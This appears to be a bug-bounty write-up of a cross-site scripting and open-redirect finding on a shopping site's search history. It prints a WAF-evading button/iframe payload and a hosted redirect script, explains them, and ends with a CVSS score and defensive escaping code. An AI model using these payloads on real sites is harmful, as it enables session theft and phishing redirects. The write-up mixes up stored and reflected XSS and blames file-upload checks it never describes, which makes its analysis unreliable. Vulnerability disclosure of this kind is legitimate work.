Stored XSS Injection & Permanent Open Redirection

11 months ago 61


Summary :

In brief, stored (persistent) cross-site scripting (XSS) happens when an attacker injects malicious code into the target application and that content is permanently stored. Later, when victims visit a page containing the stored malicious code, their browsers execute it.

Description :

At first we tried to inject a generic payload, but it did not work because of the WAF. After working on it further, we noticed that the search term is shown in the search history. After a closer look we found that we have a reflected XSS: we could send the victim a malicious link carrying our payload in the URL, and when the victim tries to search for anything, the XSS triggers and we get their account cookies. If they have saved their credit card details, we could easily buy e-coupons and gift cards with the account.

After some attempts, I successfully built a script that performs an open redirect to a malicious URL:

'"><button onclick="alert(document.write('<iframe src=https://brutelogic.com.br/xss-waf.php></iframe>'))">CLICK ME</button>

OR,

The Script Used (Hosted on our server):

<html>
<body>
<script language='javascript' type='text/javascript'>
try {
  var rurl = 'https://00eth0.xss.ht?&';
  window.top.location.replace(rurl);
} catch (exception) {
  document.write("This page has moved, <A HREF='http://ww6.gsrtc.com?&amp;&amp;jserror=1'>Click here</A> to go there.");
}
</script>
</body>
</html>

Breaking the Code:

1. The <html> and <body> tags define the HTML structure and content of the page.

2. The <script> tag defines a block of JavaScript code that is executed by the web browser. The language attribute specifies that the code is written in JavaScript, and the type attribute specifies that the code is of type text/javascript.

3. The try block contains JavaScript that attempts to execute the following:

a. The variable rurl is set to the value 'https://00eth0.xss.ht?&'.

b. The call window.top.location.replace(rurl) replaces the current web page's location with the URL stored in the rurl variable, effectively redirecting the user to the website at https://00eth0.xss.ht.

4. If an exception is thrown inside the try block (i.e., if the code in the try block fails to execute), the catch block runs instead. In this case, document.write() is used to display a message on the web page that says "This page has moved, Click here to go there." The HREF attribute of the <A> hyperlink points to the URL http://ww6.gsrtc.com?&amp;&amp;jserror=1, which is the destination the user is sent to if the code in the try block fails.

Overall, this code was attempting to redirect the user to the website at https://00eth0.xss.ht. If this redirection fails, the user is redirected to another website at http://ww6.gsrtc.com?&amp;&amp;jserror=1.

Why did this happen?

In my opinion, it happened for three reasons:

1. While uploading the file, the extension was not being checked.

2. After the file was uploaded, Content-Type validation was not done.

3. After the file was sent to the server, it was not validated by the server.

Impact :

An attacker can steal the authentication token of any user and can craft different attacks such as CSRF, session attacks, account takeover, etc.

The impact depends on what kind of information was being stored in localStorage.

Calculated CVSS :

Vector String : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N

Score — 8.2 (High)

Mitigation :

The website should keep the WAF enabled on the search feature and on every other place where a payload could be injected, and input checks should be performed at those places to mitigate this kind of issue.
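As an added defender-side example (not the write-up's own code), the snippet below contrasts a search-history page that concatenates stored queries straight into its markup, where the button payload above becomes live, with the same rendering using context-appropriate encoding, and adds an allow-list check for redirect targets like the one in the hosted script. The query list, host names and function names are constructed for this example.

```javascript
// Constructed sample of stored search-history entries; the second one
// mirrors the write-up's button payload (simplified to alert(1)).
const STORED_QUERIES = [
  "winter jackets",
  `'"><button onclick="alert(1)">CLICK ME</button>`,
];

// Encode the five HTML metacharacters so stored text cannot close the
// surrounding tag or attribute and start a new element.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Vulnerable: the stored query is dropped into both an attribute and the
// text node without any encoding, so a stored payload renders as markup.
function vulnerableRender(queries) {
  return queries
    .map((q) => `<li><a href="/search?q=${q}">${q}</a></li>`)
    .join("");
}

// Hardened: URL-encode the value inside the query string and HTML-encode
// it inside the link text; each context gets its own encoder.
function safeRender(queries) {
  return queries
    .map((q) => `<li><a href="/search?q=${encodeURIComponent(q)}">${escapeHtml(q)}</a></li>`)
    .join("");
}

// Open-redirect guard: resolve the target against the site's own origin and
// only follow http(s) URLs whose host is on the allow-list; anything else
// (foreign hosts, javascript: URLs, unparsable input) falls back to "/".
function safeRedirectTarget(target, allowedHosts, base = "https://shop.example") {
  let u;
  try { u = new URL(target, base); } catch { return "/"; }
  if (u.protocol !== "https:" && u.protocol !== "http:") return "/";
  return allowedHosts.includes(u.hostname) ? u.href : "/";
}

// Quick demonstration when the file is run directly with node.
if (typeof require !== "undefined" && require.main === module) {
  console.log(vulnerableRender(STORED_QUERIES));
  console.log(safeRender(STORED_QUERIES));
  console.log(safeRedirectTarget("https://00eth0.xss.ht?&", ["shop.example"]));
}
```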

Bounty Reward :

2K USD
